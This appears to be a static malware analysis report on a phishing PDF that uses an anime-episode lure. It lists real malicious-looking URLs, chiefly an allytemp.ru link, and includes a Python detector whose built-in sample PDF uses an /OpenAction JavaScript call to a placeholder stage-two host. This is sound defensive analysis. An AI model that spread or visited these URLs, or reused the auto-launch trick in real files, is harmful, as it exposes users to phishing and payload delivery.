Malicious PDF — malware analysis report

Static analysis result for SHA-256 d15544570e8207bd…

Verdict: MALICIOUS
File type: PDF
Size: 172.5 KB
Created: 2021-06-09 07:28:28 +03:00
Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7)
First seen: 2021-09-27
MD5: 278dab9c81274bde58599752c955f126
SHA-1: cc47b0d1b85a969d308a1d03919c9a2da5a00608
SHA-256: d15544570e8207bd8c899e5b6a098f9b17a696ccc499685a37f1aba75bda8e78
Risk score: 104

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.007 JavaScript

The file is a PDF document whose visible content is a lure for an anime episode (the link's utm_term names the episode) with a link annotation pointing at an external URL. The ML classifier and the ClamAV phishing signature both flag the file, consistent with phishing or malware distribution via that link. The external URI action is the click-through for the lure; because this is a static result, what the URL serves (a phishing page or a secondary payload) was not observed.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9984

Heuristics (5)

  • ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTION
    ClamAV flagged the file under this phishing-trojan signature.
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (object number N, generation G) is defined more than once with different body bytes. A reader that honours the first definition and one that honours the last (typically the one reached through the newest xref of an incremental update) resolve different content, a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content (an action, JavaScript, or similar).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the label after each URL names the channel (macro, JS, link annotation, document body, ...) through which it was reached.
    • https://allytemp.ru/pbw?utm_term=sword+art+online+alicization+war+of+underworld+episode+14+english+sub (PDF link annotation)
    • https://wedemewimobuxet.weebly.com/uploads/1/3/4/3/134309086/wetedejipofutuwu.pdf (PDF document text)
    • https://static.s123-cdn-static.com/uploads/4452386/normal_5ff977b6b4c8f.pdf (PDF document text)
    • https://static.s123-cdn-static.com/uploads/4414515/normal_5ff9bb9e2e4c5.pdf (PDF document text)
    • https://static.s123-cdn-static.com/uploads/4456712/normal_5fccdfced995e.pdf (PDF document text)
    • https://static.s123-cdn-static.com/uploads/4490141/normal_5fc8dea5a874e.pdf (PDF document text)
    • https://cdn-cms.f-static.net/uploads/4368222/normal_6024cd7b33779.pdf (PDF document text)
    • https://cdn-cms.f-static.net/uploads/4378161/normal_600e71136dcfc.pdf (PDF document text)
    • https://cdn-cms.f-static.net/uploads/4412575/normal_60b88b10b33aa.pdf (PDF document text)
    • https://bomawivipevesuw.weebly.com/uploads/1/3/4/8/134852605/tugadejajipoduk.pdf (PDF document text)
    • https://wetugaremuzen.weebly.com/uploads/1/3/5/2/135298520/aa9d33e5.pdf (PDF document text)
    • https://static.s123-cdn-static.com/uploads/4420597/normal_6000bfe3c8761.pdf (PDF document text)
    • http://www.ascendercorp.com/ (PDF document text)
    • http://www.ascendercorp.com/typedesigners.html (PDF document text)
    • http://www.daltonmaag.com/ (PDF document text)
    • http://vimadutukad.pbworks.com/w/file/fetch/144904953/zubupujixowigum.pdf (PDF document text)
    • https://uploads.strikinglycdn.com/files/0384cfc0-a9d5-4a62-a35a-56a180211229/forward_start_option_pricing.pdf (PDF document text)
    • http://bukafag.pbworks.com/f/16740275775.pdf (PDF document text)
    • https://uploads.strikinglycdn.com/files/cec1d892-eabc-43c1-b124-898dc3a6da95/stam_sorc_leveling_build_eso.pdf (PDF document text)
    • https://uploads.strikinglycdn.com/files/8a908f86-f4be-4b73-80d2-c9d11c145284/creative_writing_projects_middle_school.pdf (PDF document text)
    • https://uploads.strikinglycdn.com/files/9e42e805-3bcb-40b5-b2b9-d9e42f0dd702/nordictrack_c900_pro_for_sale.pdf (PDF document text)
    • https://uploads.strikinglycdn.com/files/950ee5fd-01ea-4eaf-9615-4bfaa05f446d/jubimivexubavegekalaf.pdf (PDF document text)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (PDF document text)
    • http://purl.org/dc/elements/1.1/ (PDF document text)
    • http://ns.adobe.com/pdf/1.3/ (PDF document text)
    • http://ns.adobe.com/xap/1.0/ (PDF document text)
    • http://ns.adobe.com/xap/1.0/mm/ (PDF document text)
    • http://ns.adobe.com/xap/1.0/rights/ (PDF document text)
    • http://scripts.sil.org/OFL (PDF document text)
    Of these, only the allytemp.ru entry is a clickable link action; the weebly.com, s123-cdn-static.com, f-static.net, pbworks.com and strikinglycdn.com URLs occur in page text only. The w3.org, purl.org and ns.adobe.com entries are XMP metadata namespace identifiers, and ascendercorp.com, daltonmaag.com and scripts.sil.org/OFL are font vendor and licence URLs of the kind carried in embedded fonts' name tables; none of those carry signal on their own.
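The two heuristics above, duplicate object bodies across an incremental update and URL extraction labelled by channel, can be reproduced with a small raw-object scanner. The Python below is an added example written for this page, not the scanner's own code and not derived from the analysed file. It runs on a constructed sample PDF embedded inline (the lure.example and cdn.example URLs are placeholders, not the sample's URLs), the ACTIVE_KEYS list is this example's choice of what counts as active content, and xref tables are deliberately omitted because the scanner walks raw object definitions. It shows how a first-wins and a last-wins reader disagree about the same object, and that the disagreement only matters when the later body carries active content.

```python
import re
from collections import defaultdict

# Constructed sample for this example (not the analysed file). A one-page PDF is
# followed by an incremental update that redefines object 4 harmlessly (adds an
# /Encoding) and object 1 with an /OpenAction that runs JavaScript. xref tables
# are omitted on purpose: this scanner, like the heuristic in the report, walks
# raw "N G obj ... endobj" definitions instead of trusting the xref.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 6 0 R /Annots [5 0 R] >> endobj
4 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj
5 0 obj << /Type /Annot /Subtype /Link /Rect [72 680 300 700]
  /A << /S /URI /URI (https://lure.example/pbw?utm_term=episode-14) >> >> endobj
6 0 obj << /Length 73 >> stream
BT /F1 12 Tf 72 700 Td (Download: https://cdn.example/normal_1.pdf) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
4 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica /Encoding /WinAnsiEncoding >> endobj
1 0 obj << /Type /Catalog /Pages 2 0 R
  /OpenAction << /S /JavaScript /JS (app.launchURL("https://lure.example/stage2", true)) >> >> endobj
trailer << /Root 1 0 R /Prev 0 >>
%%EOF
"""

# Keys whose presence makes a duplicate definition "active content". This list is
# the example's own assumption; the report does not say which keys it checks.
ACTIVE_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
               b"/URI", b"/SubmitForm", b"/GoToR", b"/EmbeddedFile")

# "N G obj <body> endobj". A literal "endobj" inside binary stream data would cut
# a body short; real tooling must honour /Length for those cases.
OBJ_RE = re.compile(rb"(?<!\d)(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
URI_ACTION_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'*+,;=%-]+")


def find_objects(pdf):
    """Map (num, gen) -> [(offset, body), ...] in file order, duplicates kept."""
    objs = defaultdict(list)
    for m in OBJ_RE.finditer(pdf):
        objs[(int(m.group(1)), int(m.group(2)))].append((m.start(), m.group(3).strip()))
    return objs


def resolve(pdf, key, policy):
    """Body that a first-wins or a last-wins reader would use for object `key`."""
    defs = find_objects(pdf)[key]
    return defs[0][1] if policy == "first" else defs[-1][1]


def duplicate_objects(pdf):
    """Objects defined more than once with differing bodies, rated like the
    PDF_DUPLICATE_OBJ_BODY_INCREMENTAL heuristic: info unless active content."""
    findings = []
    for key, defs in find_objects(pdf).items():
        first, last = defs[0][1], defs[-1][1]
        if len(defs) < 2 or first == last:
            continue
        active = any(k in first or k in last for k in ACTIVE_KEYS)
        findings.append({"obj": key, "definitions": len(defs), "active": active,
                         "severity": "high" if active else "info"})
    return findings


def extract_urls(pdf, policy="last"):
    """(url, channel) pairs, resolving duplicate objects by `policy`, so the
    result is what a reader with that policy would actually expose."""
    found = []
    for key, defs in find_objects(pdf).items():
        body = defs[0][1] if policy == "first" else defs[-1][1]
        via_action = set()
        for m in URI_ACTION_RE.finditer(body):           # /URI action: clickable
            url = m.group(1).decode("latin-1")
            via_action.add(url)
            found.append((url, "link annotation"))
        for m in URL_RE.finditer(body):                  # anything else URL-shaped
            url = m.group(0).decode("latin-1")
            if url in via_action:
                continue
            in_js = b"/JavaScript" in body or b"/JS" in body
            found.append((url, "JavaScript" if in_js else "document text"))
    return found


if __name__ == "__main__":
    for f in duplicate_objects(SAMPLE_PDF):
        print(f"obj {f['obj'][0]} {f['obj'][1]}: {f['definitions']} definitions, "
              f"active={f['active']}, severity={f['severity']}")
    for policy in ("first", "last"):
        print(f"URLs as seen by a {policy}-wins reader:")
        for url, channel in extract_urls(SAMPLE_PDF, policy):
            print(f"  {url}  [{channel}]")
```

Object 4 is redefined with a body-only difference and stays at info; object 1 is redefined with an /OpenAction and is raised to high. Running extract_urls with both policies shows the practical consequence: a first-wins reader never sees the JavaScript-borne URL that a last-wins reader executes, which is why a scanner has to report both resolutions rather than pick one.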

Extracted artifacts (4)

Files carved from inside the sample during analysis. All four are embedded sfnt (TrueType/OpenType) font streams, which is expected for wkhtmltopdf output; the report raises no finding on them.

font_00_sfnt_off0001d132.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x1D132
  Size: 44792 bytes
  SHA-256: 127a9c9a06f4d4d956de5172cd70881097caf93b9dad019be01a2c7ff52f6db9

font_01_sfnt_off00025a31.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x25A31
  Size: 5824 bytes
  SHA-256: 3acc46aafbf9734885c829461ba542253525c181f7ea060b2bf8ccf9ca599f31

font_02_sfnt_off00026e12.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x26E12
  Size: 11804 bytes
  SHA-256: 3972a91ade3172cd1b43b55f70ba393402d1611789a329598186386496ac7475

font_03_sfnt_off000294c2.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x294C2
  Size: 4324 bytes
  SHA-256: 1158d95dac44631f497756703988ba3645251422e7ff0015d3fca430225e7c3e